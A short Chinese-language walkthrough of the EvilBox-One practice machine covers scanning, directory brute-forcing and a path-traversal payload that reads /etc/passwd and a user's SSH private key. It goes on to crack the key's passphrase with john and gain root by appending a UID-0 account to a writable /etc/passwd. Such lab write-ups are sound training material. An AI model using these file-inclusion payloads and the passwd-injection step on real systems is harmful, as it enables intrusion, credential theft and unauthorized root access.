ailx10
网络安全优秀回答者
网络安全硕士
去咨询
1、主机发现(192.168.199.144)主机发现
2、端口扫描(22、80)端口扫描
3、目录发现[19:51:35] 200 - 12B - /robots.txt[19:51:35] 301 - 319B - /secret -> http://192.168.199.144/secret/目录发现
4、寻找线索疑似用户名
5、访问,空白空白
6、继续暴力破解gobuster dir -u http://192.168.199.144/secret/ -w /usr/share/wordlists/dirb/big.txt -x .php喜的目录
7、访问,继续空白继续空白
8、暴力破解参数ffuf -u 'http://192.168.199.144/secret/evil.php?FUZZ=../../../../../etc/passwd' -w "/usr/share/wordlists/dirbuster/directory-list-2.3-small.txt" -fs 0参数
9、访问,找到用户名 mowree文件包含
10、利用文件包含,去找密码http://192.168.199.144/secret/evil.php?command=/home/mowree/.ssh/id_rsa密码
11、尝试登录,需要密码(被 passphrase 保护)ssh -i id_rsa mowree@192.168.199.144尝试登录
12、john 暴力破解,得到密码 unicornssh2john id_rsa > password john --show password密码 unicorn
13、再次登录拿到普通flag
14、/etc/passwd 具有写权限w 写权限
15、生成123基于MD5的密码mowree@EvilBoxOne:~$ openssl passwd -helpUsage: passwd [options]Valid options are: -help Display this summary -in infile Read passwords from file -noverify Never verify when reading password from terminal -quiet No warnings -table Format output as table -reverse Switch table columns -salt val Use provided salt -stdin Read passwords from stdin -6 SHA512-based password algorithm -5 SHA256-based password algorithm -apr1 MD5-based password algorithm, Apache variant -1 MD5-based password algorithm -aixmd5 AIX MD5-based password algorithm -crypt Standard Unix password algorithm (default) -rand val Load the file(s) into the random number generator -writerand outfile Write random data to the specified file生成密码
16、向passwd 写入用户ailx00的信息(注意是单引号),成功拿到root的flagecho 'ailx00:$1$Tuse491W$mmxvOkGDQHibl4DzhH3Fe1:0:0:root:/root:/bin/bash' >> /etc/passwd获得root的flag
到此,实验完成~
发布于 2022-08-26 23:45